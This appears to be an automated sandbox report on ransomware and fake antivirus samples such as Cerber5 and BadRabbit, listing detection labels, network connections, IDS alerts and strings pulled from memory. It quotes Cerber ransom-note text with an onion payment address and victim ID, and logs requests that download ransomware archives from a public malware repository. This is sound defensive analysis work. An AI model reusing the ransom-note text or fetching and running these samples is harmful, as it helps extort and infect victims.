          Source: 11.0.Endermanch@BadRabbit.exe.80000.2.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 4.0.Endermanch@Antivirus.exe.400000.2.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 13.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.Endermanch@AntivirusPro2017.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 49.0.Endermanch@InternetSecurityGuard.exe.13140000.0.unpackAvira: Label: TR/Simda.igtnk
          Source: 11.0.Endermanch@BadRabbit.exe.80000.3.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 6.0.Endermanch@AntivirusPro2017.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 16.2.Endermanch@Cerber5.exe.4e50000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
          Source: 6.0.Endermanch@AntivirusPro2017.exe.400000.4.unpackAvira: Label: TR/Fraud.Gen2
          Source: 6.0.Endermanch@AntivirusPro2017.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.0.Endermanch@Antivirus.exe.400000.1.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 26.0.antivirus-platinum.exe.400000.0.unpackAvira: Label: TR/Crypt.CFI.Gen
          Source: 16.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
          Source: 25.0.avpc2009.exe.400000.0.unpackAvira: Label: TR/Fake.avpc.94312
          Source: 13.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.Endermanch@BadRabbit.exe.80000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 4.0.Endermanch@Antivirus.exe.400000.0.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 4.0.Endermanch@Antivirus.exe.400000.3.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 6.0.Endermanch@AntivirusPro2017.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen

          Exploits

          barindex
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:80
          Source: global trafficTCP traffic: 192.168.2.3:139
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:445
          Source: global trafficTCP traffic: 192.168.2.3:139

          Compliance

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeUnpacked PE file: 16.2.Endermanch@Cerber5.exe.400000.0.unpack
          Source: 4d44bed6.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49773 version: TLS 1.2
          Source: 4d44bed6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 00000005.00000000.437900629.0000000000412000.00000002.00000001.01000000.00000008.sdmp, Endermanch@AntivirusPlatinum.exe, 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmp, Endermanch@AnViPC2009.exe, 00000008.00000000.450117816.0000000000412000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@AnViPC2009.exe, 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmp
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmp
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 00000016.00000000.479926826.0000000000D62000.00000002.00000001.01000000.00000017.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: z:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: x:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: v:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: t:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: r:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: p:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: n:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: l:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: j:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: h:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: f:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: b:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: y:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: w:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: u:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: s:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: q:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: o:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: m:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: k:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: i:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: g:
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeFile opened: e:
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: c:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: a:
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,5_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,5_2_0040AE97
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00405BD2 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,8_2_00405BD2
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_0040AE70 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,8_2_0040AE70

          Networking

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.107.5.88 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 139
          Source: TrafficSnort IDS: 2023626 ET TROJAN Ransomware/Cerber Checkin M3 (15) 192.168.2.5:55040 -> 93.107.12.0:6893
          Source: TrafficSnort IDS: 2809804 ETPRO MALWARE FakeAdwareCleaner.A Checkin 192.168.2.5:49804 -> 185.53.177.53:80
          Source: Endermanch@Cerber5.exe, 00000010.00000002.602477819.0000000005478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000010.00000003.482478119.0000000005462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">v8S8GZ</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">r8LKgartS</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br>
          Source: Endermanch@Cerber5.exe, 00000010.00000003.528821049.000000000547A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
          Source: Endermanch@Cerber5.exe, 00000010.00000003.528821049.000000000547A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000010.00000002.600328672.0000000005468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">v8S8GZ</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">r8LKgartS</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/E4EE-0CB2-5F62-0098-B68C</span><br>
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
